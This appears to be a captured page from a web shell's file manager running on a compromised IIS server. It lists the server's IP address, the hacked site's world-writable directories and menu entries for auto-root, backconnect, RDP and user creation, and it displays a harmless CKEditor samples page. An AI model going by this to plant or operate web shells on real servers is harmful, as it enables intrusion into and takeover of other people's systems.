Windows NT 5XH5ME 10.0 build 17763 (Windows Server 2016) AMD64
Microsoft-IIS/10.0
: | : 13.58.207.43
Cant Read [ /etc/named.conf ]
8.0.30
IWPD_574(rhy10449)
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
D: /
Inetpub /
vhosts /
rhythmmedical.in /
httpdocs /
superadm /
bower_components /
ckeditor /
samples /
old /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxrwxrwx
autogrow
[ DIR ]
drwxrwxrwx
bbcode
[ DIR ]
drwxrwxrwx
codesnippet
[ DIR ]
drwxrwxrwx
devtools
[ DIR ]
drwxrwxrwx
dialog
[ DIR ]
drwxrwxrwx
divarea
[ DIR ]
drwxrwxrwx
docprops
[ DIR ]
drwxrwxrwx
enterkey
[ DIR ]
drwxrwxrwx
htmlwriter
[ DIR ]
drwxrwxrwx
image2
[ DIR ]
drwxrwxrwx
magicline
[ DIR ]
drwxrwxrwx
mathjax
[ DIR ]
drwxrwxrwx
placeholder
[ DIR ]
drwxrwxrwx
sharedspace
[ DIR ]
drwxrwxrwx
sourcedialog
[ DIR ]
drwxrwxrwx
stylesheetparser
[ DIR ]
drwxrwxrwx
tableresize
[ DIR ]
drwxrwxrwx
toolbar
[ DIR ]
drwxrwxrwx
uicolor
[ DIR ]
drwxrwxrwx
wysiwygarea
[ DIR ]
drwxrwxrwx
ajax.html
2.64
KB
-rw-rw-rw-
api.html
7.01
KB
-rw-rw-rw-
appendto.html
2.21
KB
-rw-rw-rw-
datafiltering.html
46.37
KB
-rw-rw-rw-
divreplace.html
4.56
KB
-rw-rw-rw-
index.html
8.16
KB
-rw-rw-rw-
inlineall.html
9.96
KB
-rw-rw-rw-
inlinebycode.html
6.04
KB
-rw-rw-rw-
inlinetextarea.html
4.8
KB
-rw-rw-rw-
jquery.html
7.33
KB
-rw-rw-rw-
readonly.html
2.82
KB
-rw-rw-rw-
replacebyclass.html
6.85
KB
-rw-rw-rw-
replacebycode.html
6.75
KB
-rw-rw-rw-
sample.css
4.97
KB
-rw-rw-rw-
sample.js
1.64
KB
-rw-rw-rw-
sample_posteddata.php
789
B
-rw-rw-rw-
tabindex.html
2.35
KB
-rw-rw-rw-
uicolor.html
2.54
KB
-rw-rw-rw-
uilanguages.html
4.39
KB
-rw-rw-rw-
xhtmlstyle.html
6.86
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.html
<!DOCTYPE html> <!-- Copyright (c) 2003-2017, CKSource - Frederico Knabben. All rights reserved. For licensing, see LICENSE.md or http://ckeditor.com/license --> <html> <head> <meta charset="utf-8"> <title>CKEditor Samples</title> <link rel="stylesheet" href="sample.css"> </head> <body> <h1 class="samples"> CKEditor Samples </h1> <div class="warning deprecated"> These samples are not maintained anymore. Check out the <a href="http://sdk.ckeditor.com/">brand new samples in CKEditor SDK</a>. </div> <div class="twoColumns"> <div class="twoColumnsLeft"> <h2 class="samples"> Basic Samples </h2> <dl class="samples"> <dt><a class="samples" href="replacebyclass.html">Replace textarea elements by class name</a></dt> <dd>Automatic replacement of all textarea elements of a given class with a CKEditor instance.</dd> <dt><a class="samples" href="replacebycode.html">Replace textarea elements by code</a></dt> <dd>Replacement of textarea elements with CKEditor instances by using a JavaScript call.</dd> <dt><a class="samples" href="jquery.html">Create editors with jQuery</a></dt> <dd>Creating standard and inline CKEditor instances with jQuery adapter.</dd> </dl> <h2 class="samples"> Basic Customization </h2> <dl class="samples"> <dt><a class="samples" href="uicolor.html">User Interface color</a></dt> <dd>Changing CKEditor User Interface color and adding a toolbar button that lets the user set the UI color.</dd> <dt><a class="samples" href="uilanguages.html">User Interface languages</a></dt> <dd>Changing CKEditor User Interface language and adding a drop-down list that lets the user choose the UI language.</dd> </dl> <h2 class="samples">Plugins</h2> <dl class="samples"> <dt><a class="samples" href="codesnippet/codesnippet.html">Code Snippet plugin</a> <span class="new">New!</span></dt> <dd>View and modify code using the Code Snippet plugin.</dd> <dt><a class="samples" href="image2/image2.html">New Image plugin</a> <span class="new">New!</span></dt> <dd>Using the new Image plugin to insert captioned images and adjust their dimensions.</dd> <dt><a class="samples" href="mathjax/mathjax.html">Mathematics plugin</a> <span class="new">New!</span></dt> <dd>Create mathematical equations in TeX and display them in visual form.</dd> <dt><a class="samples" href="sourcedialog/sourcedialog.html">Editing source code in a dialog</a> <span class="new">New!</span></dt> <dd>Editing HTML content of both inline and classic editor instances.</dd> <dt><a class="samples" href="autogrow/autogrow.html">AutoGrow plugin</a></dt> <dd>Using the AutoGrow plugin in order to make the editor grow to fit the size of its content.</dd> <dt><a class="samples" href="bbcode/bbcode.html">Output for BBCode</a></dt> <dd>Configuring CKEditor to produce BBCode tags instead of HTML.</dd> <dt><a class="samples" href="devtools/devtools.html">Developer Tools plugin</a></dt> <dd>Using the Developer Tools plugin to display information about dialog window UI elements to allow for easier customization.</dd> <dt><a class="samples" href="docprops/docprops.html">Document Properties plugin</a></dt> <dd>Manage various page meta data with a dialog.</dd> <dt><a class="samples" href="magicline/magicline.html">Magicline plugin</a></dt> <dd>Using the Magicline plugin to access difficult focus spaces.</dd> <dt><a class="samples" href="placeholder/placeholder.html">Placeholder plugin</a></dt> <dd>Using the Placeholder plugin to create uneditable sections that can only be created and modified with a proper dialog window.</dd> <dt><a class="samples" href="sharedspace/sharedspace.html">Shared-Space plugin</a></dt> <dd>Having the toolbar and the bottom bar spaces shared by different editor instances.</dd> <dt><a class="samples" href="stylesheetparser/stylesheetparser.html">Stylesheet Parser plugin</a></dt> <dd>Using the Stylesheet Parser plugin to fill the Styles drop-down list based on the CSS classes available in the document stylesheet.</dd> <dt><a class="samples" href="tableresize/tableresize.html">TableResize plugin</a></dt> <dd>Using the TableResize plugin to enable table column resizing.</dd> <dt><a class="samples" href="uicolor/uicolor.html">UIColor plugin</a></dt> <dd>Using the UIColor plugin to pick up skin color.</dd> <dt><a class="samples" href="wysiwygarea/fullpage.html">Full page support</a></dt> <dd>CKEditor inserted with a JavaScript call and used to edit the whole page from <html> to </html>.</dd> </dl> </div> <div class="twoColumnsRight"> <h2 class="samples"> Inline Editing </h2> <dl class="samples"> <dt><a class="samples" href="inlineall.html">Massive inline editor creation</a></dt> <dd>Turn all elements with <code>contentEditable = true</code> attribute into inline editors.</dd> <dt><a class="samples" href="inlinebycode.html">Convert element into an inline editor by code</a></dt> <dd>Conversion of DOM elements into inline CKEditor instances by using a JavaScript call.</dd> <dt><a class="samples" href="inlinetextarea.html">Replace textarea with inline editor</a> <span class="new">New!</span></dt> <dd>A form with a textarea that is replaced by an inline editor at runtime.</dd> </dl> <h2 class="samples"> Advanced Samples </h2> <dl class="samples"> <dt><a class="samples" href="datafiltering.html">Data filtering and features activation</a> <span class="new">New!</span></dt> <dd>Data filtering and automatic features activation basing on configuration.</dd> <dt><a class="samples" href="divreplace.html">Replace DIV elements on the fly</a></dt> <dd>Transforming a <code>div</code> element into an instance of CKEditor with a mouse click.</dd> <dt><a class="samples" href="appendto.html">Append editor instances</a></dt> <dd>Appending editor instances to existing DOM elements.</dd> <dt><a class="samples" href="ajax.html">Create and destroy editor instances for Ajax applications</a></dt> <dd>Creating and destroying CKEditor instances on the fly and saving the contents entered into the editor window.</dd> <dt><a class="samples" href="api.html">Basic usage of the API</a></dt> <dd>Using the CKEditor JavaScript API to interact with the editor at runtime.</dd> <dt><a class="samples" href="xhtmlstyle.html">XHTML-compliant style</a></dt> <dd>Configuring CKEditor to produce XHTML 1.1 compliant attributes and styles.</dd> <dt><a class="samples" href="readonly.html">Read-only mode</a></dt> <dd>Using the readOnly API to block introducing changes to the editor contents.</dd> <dt><a class="samples" href="tabindex.html">"Tab" key-based navigation</a></dt> <dd>Navigating among editor instances with tab key.</dd> <dt><a class="samples" href="dialog/dialog.html">Using the JavaScript API to customize dialog windows</a></dt> <dd>Using the dialog windows API to customize dialog windows without changing the original editor code.</dd> <dt><a class="samples" href="divarea/divarea.html">Replace Textarea with a "DIV-based" editor</a></dt> <dd>Using <code>div</code> instead of <code>iframe</code> for rich editing.</dd> <dt><a class="samples" href="enterkey/enterkey.html">Using the "Enter" key in CKEditor</a></dt> <dd>Configuring the behavior of <em>Enter</em> and <em>Shift+Enter</em> keys.</dd> <dt><a class="samples" href="htmlwriter/outputforflash.html">Output for Flash</a></dt> <dd>Configuring CKEditor to produce HTML code that can be used with Adobe Flash.</dd> <dt><a class="samples" href="htmlwriter/outputhtml.html">Output HTML</a></dt> <dd>Configuring CKEditor to produce legacy HTML 4 code.</dd> <dt><a class="samples" href="toolbar/toolbar.html">Toolbar Configurations</a></dt> <dd>Configuring CKEditor to display full or custom toolbar layout.</dd> </dl> </div> </div> <div id="footer"> <hr> <p> CKEditor - The text editor for the Internet - <a class="samples" href="http://ckeditor.com/">http://ckeditor.com</a> </p> <p id="copy"> Copyright © 2003-2017, <a class="samples" href="http://cksource.com/">CKSource</a> - Frederico Knabben. All rights reserved. </p> </div> </body> </html>
Close